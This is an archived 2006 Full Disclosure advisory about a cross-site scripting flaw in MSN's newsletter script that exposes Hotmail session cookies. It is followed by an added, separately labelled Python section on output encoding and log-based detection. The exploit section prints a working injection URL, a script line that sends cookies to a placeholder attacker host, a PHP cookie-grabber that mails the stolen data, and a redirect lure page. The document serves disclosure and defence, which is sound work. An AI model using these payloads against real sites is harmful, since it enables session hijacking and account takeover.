Full Disclosure mailing list archives
Hotmail/MSN Cross Site Scripting Vulnerability
From: simo () morx org
Date: Thu, 10 Aug 2006 14:36:08 -0000 (GMT)
Hotmail/MSN Cross Site Scripting Vulnerability

Author: Simo64
Contact: simo64_at_morx_dot_org
Discovered: 07/25/2006
Published: 08/10/2006
Vendor: MSN.com
Service: Hotmail.com Webmail Service
Vulnerability: Cross Site Scripting (Cookie-Theft)
Severity: Medium/High
Tested on: IE 6.0, Firefox 1.5 and Opera (should work on all browsers)

Morx Security Research Team
http://www.morx.org

Details:

newsletter.msn.com's insite.asp script is prone to cross-site scripting attacks. This problem is due to a failure in the application to properly sanitize user-supplied input (the RE query parameter is echoed back into the page unencoded).

Impact:

An attacker can exploit the vulnerable script to have arbitrary script code executed in the browser of an authenticated MSN user, in the context of the MSN web page. This results in the theft of the cookie-based authentication, giving the attacker temporary access to the victim's email account (until the cookie expires, about 24 hours), as well as other types of attack.

Exploit:

    http://newsletters.msn.com/xs-v3/insite.asp?CU=1&RE=')></script><script src=http://attacker/redir.js>

where redir.js can contain:

    location.href='http://attacker-site/cookie-grabber.php?cookie='+escape(document.cookie)

and cookie-grabber.php can be:

    <?php
    $cookie = $_GET['cookie'];
    $ip = getenv("REMOTE_ADDR");
    $msg = "Cookie: $cookie\nIP Address: $ip";
    $subject = "cookie";
    mail("your () email org", $subject, $msg);
    header("Location: http://attacker-site/some-pic.jpg");
    ?>

The attacker would also use an HTML file to redirect the victim to the XSS location, for example:

    <meta http-equiv="refresh" content="0; url=http://newsletters.msn.com/xs-v3/insite.asp?CU=1&RE=')></script><script src=http://attacker/redir.js>">

Disclaimer:

This entire document is for educational, testing and demonstration purposes only. Modifying, using and/or publishing this information is entirely at your OWN risk. The information provided in this advisory is to be used/tested on your OWN machine/account. I cannot be held responsible for any of the above.
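As an added illustration from the defender's side (not part of the advisory or of MSN's code), the following Python models the injection context the exploit URL relies on (a parameter echoed into a JavaScript string inside a script element), the output encoding that closes the hole, and a check for RE values carrying markup in web server log lines. The exact rendering context of insite.asp, the `track()` function name and the log lines are all assumed or constructed.

```python
import json
import re
from urllib.parse import urlparse, parse_qs, unquote

# Constructed stand-in for the vulnerable page: the RE query parameter is
# echoed, unencoded, into a JavaScript string literal inside a <script>
# element. The real insite.asp context is assumed, not taken from the page.
def render_vulnerable(re_param: str) -> str:
    return "<script>track('" + re_param + "');</script>"

# Hardened variant: json.dumps yields a valid JS string literal, and escaping
# '<' and '>' keeps a "</script>" inside the value from ending the element.
def render_hardened(re_param: str) -> str:
    safe = json.dumps(re_param).replace("<", "\\u003c").replace(">", "\\u003e")
    return "<script>track(" + safe + ");</script>"

def script_element_count(page: str) -> int:
    # A correctly encoded page contains exactly the one <script> we emitted.
    return len(re.findall(r"<script\b", page, flags=re.IGNORECASE))

# Detection: flag request lines whose RE parameter carries script markup.
# Assumes a Common Log Format-like line with the request in double quotes;
# the extra unquote() also catches double-encoded values.
SUSPECT = re.compile(r"</?script|javascript:", re.IGNORECASE)

def flag_request(log_line: str) -> bool:
    m = re.search(r'"(?:GET|POST) (\S+) HTTP/', log_line)
    if not m:
        return False
    query = parse_qs(urlparse(m.group(1)).query, keep_blank_values=True)
    return any(SUSPECT.search(unquote(v)) for v in query.get("RE", []))

# Constructed sample access-log lines (not from the advisory).
LOG_LINES = [
    '203.0.113.5 - - [10/Aug/2006:14:36:08 +0000] "GET /xs-v3/insite.asp?CU=1&RE=weekly HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Aug/2006:14:37:12 +0000] "GET /xs-v3/insite.asp?CU=1&RE=%27)%3E%3C/script%3E%3Cscript%20src=http://attacker/redir.js%3E HTTP/1.1" 200 5120',
]

def flagged_lines(lines=LOG_LINES):
    return [line for line in lines if flag_request(line)]

if __name__ == "__main__":
    payload = "')></script><script src=http://attacker/redir.js>"
    print(script_element_count(render_vulnerable(payload)))  # 2
    print(script_element_count(render_hardened(payload)))    # 1
    print(len(flagged_lines()))                               # 1
```

Output encoding addresses the injection itself; marking the session cookie HttpOnly would separately blunt the cookie theft the advisory describes, since document.cookie then no longer exposes it.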
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/